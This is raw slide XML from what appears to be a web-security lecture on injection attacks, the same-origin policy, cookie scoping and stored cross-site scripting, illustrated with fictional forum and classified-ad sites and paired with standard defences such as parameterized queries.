        <p:spPr>
          <a:xfrm>
            <a:off x="5847436" y="5763990"/>
            <a:ext cx="887700" cy="61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Silverlight</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="Shape 185"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6817528" y="5824621"/>
            <a:ext cx="887700" cy="61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AND MORE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491625" y="1578075"/>
            <a:ext cx="3859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Some of you wondered how attackers or malware actually apply some of the techniques we've covered (i.e. buffer overflows, shellcode, etc...)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="Shape 187"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="2192950" y="3064800"/>
            <a:ext cx="1701900" cy="7284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FIREWALL   +  NAT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="Shape 188"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3822300" y="2986550"/>
            <a:ext cx="1376460" cy="1646892"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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Internet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454750" y="4277025"/>
            <a:ext cx="20895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5636350" y="2143425"/>
            <a:ext cx="20895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Server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2789901" y="4658030"/>
            <a:ext cx="24336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/>
              <a:t>Data received by web browsers can include data plus CODE (e.g. javascript)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720650" y="5395450"/>
            <a:ext cx="35766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code is run on the client's machine (usually in a sandbox today)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983225" y="5960800"/>
            <a:ext cx="34905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/>
              <a:t>Problem????  :D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Shape 80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Related injection vectors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="807" name="Shape 80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LDAP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XPATH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XML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XSLT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OS commands (system("...."))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logs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/>
              <a:t>javascript interpreter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Shape 8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Defending against Injection attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="813" name="Shape 8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https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet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The basic defenses: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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng"/>
              <a:t>parameterized queries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Not vulnerable to injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>not always an option!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Use stored procedures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does not dynamically build the SQL statements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Encoding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SQLi injection attack cheat sheets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="819" name="Shape 81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>
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet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http://ha.ckers.org/sqlinjection/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http://www.veracode.com/security/sql-injection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 txBox="1"/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Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="825" name="Shape 825"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4836036"/>
            <a:ext cx="7772400" cy="103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OWASP's #2 top vulnerability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Shape 8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Cross Site Scripting (XSS) Formal Assessment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="831" name="Shape 83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832" name="Shape 8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5625"/>
            <a:ext cx="9126612" cy="4648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 txBox="1"/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First, some browser notes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="838" name="Shape 838"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4836036"/>
            <a:ext cx="7772400" cy="103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Browser Security &amp; Policies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="844" name="Shape 84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Same Origin Policy (SOP)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 u="sng"/>
              <a:t>The same-origin policy restricts how a document or script loaded from one origin can interact with a resource from another origin.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meant to prevent cross-site issues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evil.com cannot access content from bank.com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is everywhere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SOP Implemented differently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 sz="3000"/>
              <a:t>GET / POST request can be made from one domain to another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45" name="Shape 8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913" y="5929925"/>
            <a:ext cx="614362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SOP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="851" name="Shape 85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GET / POST can only be read under the following conditions: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ports match on both sites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domain matches on both sites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subdomain matches on both sites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52" name="Shape 8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008" y="3834448"/>
            <a:ext cx="7230317" cy="2733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Shape 8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SOP Exceptions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="858" name="Shape 85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Two different subdomains (thus different origin) under the same domain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i.e.     secure.live.com vs vulnerable.live.com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wildcards!!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*.google.com or *.live.com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Risk here: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Domain lowering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i.e.     secure.live.com vs vulnerable.live.com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SOP and Scripts </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="864" name="Shape 86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When exposing or including a resource cross-domain such as JSON, or javascript, or etc...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Javascript APIs allow documents(webpages) to directly reference each other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 sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="66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iframe.contentWindow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 sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="66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window.parent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 sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="66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window.open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and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="669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window.opener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When documents do not have same origin, access is limited to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Window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8"/>
              </a:rPr>
              <a:t>Location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> objects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Some browsers allow more access though.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20075"/>
            <a:ext cx="2679700" cy="17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Big Picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="Shape 200"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924507" y="3756338"/>
            <a:ext cx="1175400" cy="11433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201" name="Shape 201"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="4811469" y="3988142"/>
            <a:ext cx="1701900" cy="7284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FIREWALL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="Shape 202"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610621" y="4968357"/>
            <a:ext cx="1191000" cy="92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Authentication</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Shape 203"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7916630" y="4968357"/>
            <a:ext cx="1191000" cy="92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Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Shape 204"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7836664" y="2787097"/>
            <a:ext cx="1263300" cy="92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Web</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Shape 205"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6125575" y="3434605"/>
            <a:ext cx="1343250" cy="999432"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator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 Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="206" name="Shape 206"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="205" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2458075" y="3244621"/>
            <a:ext cx="3667500" cy="6897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7" name="Shape 207"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2199961" y="3539498"/>
            <a:ext cx="3957600" cy="5667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8" name="Shape 208"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="205" idx="3"/>
            <a:endCxn id="200" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7468825" y="3934321"/>
            <a:ext cx="455700" cy="39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209" name="Shape 209"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="204" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="7412764" y="3250747"/>
            <a:ext cx="423900" cy="39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210" name="Shape 210"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7324863" y="4433998"/>
            <a:ext cx="663600" cy="55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211" name="Shape 211"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="205" idx="2"/>
            <a:endCxn id="202" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6797200" y="4434037"/>
            <a:ext cx="408900" cy="53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212" name="Shape 212"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7021870" y="2671820"/>
            <a:ext cx="622800" cy="61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AJAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Shape 213"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172864" y="2671820"/>
            <a:ext cx="744300" cy="61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FLASH</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>/ FLEX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Shape 214"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5665543" y="5097051"/>
            <a:ext cx="887700" cy="61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APPLETS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Shape 215"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5847436" y="5763990"/>
            <a:ext cx="887700" cy="61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Silverlight</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Shape 216"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6817528" y="5824621"/>
            <a:ext cx="887700" cy="61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AND MORE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491625" y="1578075"/>
            <a:ext cx="3859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Some of you wondered how attackers or malware actually apply some of the techniques we've covered (i.e. buffer overflows, shellcode, etc...)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="Shape 218"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="2192950" y="3064800"/>
            <a:ext cx="1701900" cy="7284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FIREWALL   +  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000"/>
              <a:t>NAT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="Shape 219"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3822300" y="2986550"/>
            <a:ext cx="1376460" cy="1646892"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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Internet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454750" y="4277025"/>
            <a:ext cx="20895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636350" y="2143425"/>
            <a:ext cx="20895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Server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528475" y="4633450"/>
            <a:ext cx="3711600" cy="18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 users are rarely ever directly attacked (by hackers or malware).  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b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NAT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>prevents most direct attacks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Instead users face many </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>indirect attacks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Users are commonly attacked by malware hosted on malicious / hacked websites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SOP and Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="870" name="Shape 87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Cookies by default allow read/write access if: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the domain is the same (limited subdomain checks)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foo.bar.com -&gt;   bar.com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bar.com -&gt; foo.bar.com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Thats it!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no check on port numbers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no check on scheme (secure vs insecure)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XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="876" name="Shape 87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Serious problem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since the beginning of TIME!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NOT LANGUAGE SPECIFIC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ALL WEB PLATFORMS ARE VULNERABLE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multiple variations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Stored XSS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Reflected XSS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DOM XSS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XSS in Flash/Flex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no easy fix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very well known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see OWASP!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Shape 88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XSS Targets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="882" name="Shape 88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SQLi clearly targets the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>database server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XSS can target a number of things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Usually </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>other users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u="sng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Shape 88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XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="888" name="Shape 88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Is script injection (similar to OWASP #1 injection vulnerabilities)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usually always involves running scripts on a user's browser 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Goal for attackers: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Distribute malicious scripts to other users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Shape 89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894" name="Shape 89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Say we have a forum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linux help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gaming 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fantasy football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Users can post comments and posts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="895" name="Shape 8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5500" y="4737250"/>
            <a:ext cx="1511300" cy="180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Shape 896"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4356977" y="4198186"/>
            <a:ext cx="1984932" cy="2213136"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="897" name="Shape 897"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2173525" y="5607475"/>
            <a:ext cx="528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898" name="Shape 8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3000" y="4699425"/>
            <a:ext cx="1143000" cy="18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Shape 899"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2161739">
            <a:off x="6195972" y="4304076"/>
            <a:ext cx="3156100" cy="446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www.fantasy-quidditch-league.com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Shape 90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XSS Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="905" name="Shape 90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An attacker can post comments as well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For XSS, these comments will include malicious javascript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It will be stored like all other comments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usually as text in the database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="906" name="Shape 9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4654700"/>
            <a:ext cx="1968500" cy="19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7" name="Shape 9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5500" y="4737250"/>
            <a:ext cx="1511300" cy="180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08" name="Shape 908"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4356977" y="4198186"/>
            <a:ext cx="1984932" cy="2213136"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="909" name="Shape 909"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2173525" y="5607475"/>
            <a:ext cx="528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10" name="Shape 910"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2798800" y="5339575"/>
            <a:ext cx="952800" cy="535800"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner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XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="911" name="Shape 911"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7523200" y="5339575"/>
            <a:ext cx="952800" cy="535800"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner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XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="912" name="Shape 912"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2161739">
            <a:off x="6195972" y="4304076"/>
            <a:ext cx="3156100" cy="446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www.fantasy-quidditch-league.com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Shape 9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XSS Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="918" name="Shape 91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From that point on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Any user who views that comment on a page will be attacked by that XSS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(meaning a page loads with that comment)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also if they have javascript enabled</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="919" name="Shape 9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5500" y="4737250"/>
            <a:ext cx="1511300" cy="180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Shape 920"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4356977" y="4198186"/>
            <a:ext cx="1984932" cy="2213136"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="921" name="Shape 921"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7523200" y="5339575"/>
            <a:ext cx="952800" cy="535800"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner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XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="922" name="Shape 9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0075" y="4952575"/>
            <a:ext cx="1143000" cy="18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" name="Shape 9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9050" y="4952575"/>
            <a:ext cx="1143000" cy="18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4" name="Shape 9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975" y="3575050"/>
            <a:ext cx="1143000" cy="18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5" name="Shape 9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3950" y="3575050"/>
            <a:ext cx="1143000" cy="181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6" name="Shape 926"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="921" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1468900" y="4664575"/>
            <a:ext cx="6054300" cy="9429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27" name="Shape 927"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3136275" y="4505850"/>
            <a:ext cx="4356900" cy="10917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28" name="Shape 928"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="921" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2272900" y="5607475"/>
            <a:ext cx="5250300" cy="4368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29" name="Shape 929"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4128675" y="5617400"/>
            <a:ext cx="3364500" cy="6252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30" name="Shape 930"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2161739">
            <a:off x="6195972" y="4304076"/>
            <a:ext cx="3156100" cy="446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www.fantasy-quidditch-league.com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Imagine a classified ad website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blaigslist.com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Users can post simple ads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="936" name="Shape 9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882" y="3393714"/>
            <a:ext cx="3347464" cy="3174185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Shape 9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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="938" name="Shape 938"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081475" y="3731700"/>
            <a:ext cx="18162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Secure Web Developer Needed!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Contact blah blah blah</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="939" name="Shape 9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5500" y="4737250"/>
            <a:ext cx="1511300" cy="180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Shape 940"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4356977" y="4198186"/>
            <a:ext cx="1984932" cy="2213136"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="941" name="Shape 941"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590350" y="6163275"/>
            <a:ext cx="1062000" cy="35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SUBMIT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="942" name="Shape 942"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="941" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3652350" y="5607525"/>
            <a:ext cx="3771300" cy="73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43" name="Shape 943"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2161739">
            <a:off x="6653172" y="3923076"/>
            <a:ext cx="3156100" cy="446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blaigslist.com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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="949" name="Shape 94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gets rendered as such:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="950" name="Shape 9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5500" y="4737250"/>
            <a:ext cx="1511300" cy="180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Shape 951"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3721775" y="3550800"/>
            <a:ext cx="3195900" cy="301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&lt;html&gt;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&lt;body&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;h1&gt;New Classified posting&lt;/h1&gt;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&lt;h2&gt;Description&lt;/h2&gt;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&lt;hr/&gt;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&lt;/body&gt;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&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="952" name="Shape 952"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6540400" y="3562975"/>
            <a:ext cx="1826100" cy="117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953" name="Shape 953"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6639650" y="6520550"/>
            <a:ext cx="1707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954" name="Shape 954"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2630050" y="4485975"/>
            <a:ext cx="1042200" cy="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55" name="Shape 955"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1399375" y="4312300"/>
            <a:ext cx="17766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Static content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="956" name="Shape 956"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886975" y="5074750"/>
            <a:ext cx="19155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Secure Web Developer  Needed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="957" name="Shape 957"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="956" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2411575" y="5288050"/>
            <a:ext cx="1475400" cy="59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58" name="Shape 958"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956625" y="5299475"/>
            <a:ext cx="27096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Dynamic (user supplied) content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="959" name="Shape 959"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2161739">
            <a:off x="6653172" y="3923076"/>
            <a:ext cx="3156100" cy="446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blaigslist.com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Shape 9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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="965" name="Shape 96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Users who view that ad see the new posting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This works fine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but it is NOT secure!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="966" name="Shape 9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5500" y="4737250"/>
            <a:ext cx="1511300" cy="180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67" name="Shape 967"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4356977" y="4198186"/>
            <a:ext cx="1984932" cy="2213136"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="968" name="Shape 9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0075" y="4952575"/>
            <a:ext cx="1143000" cy="18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9" name="Shape 9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9050" y="4952575"/>
            <a:ext cx="1143000" cy="18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0" name="Shape 9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975" y="3575050"/>
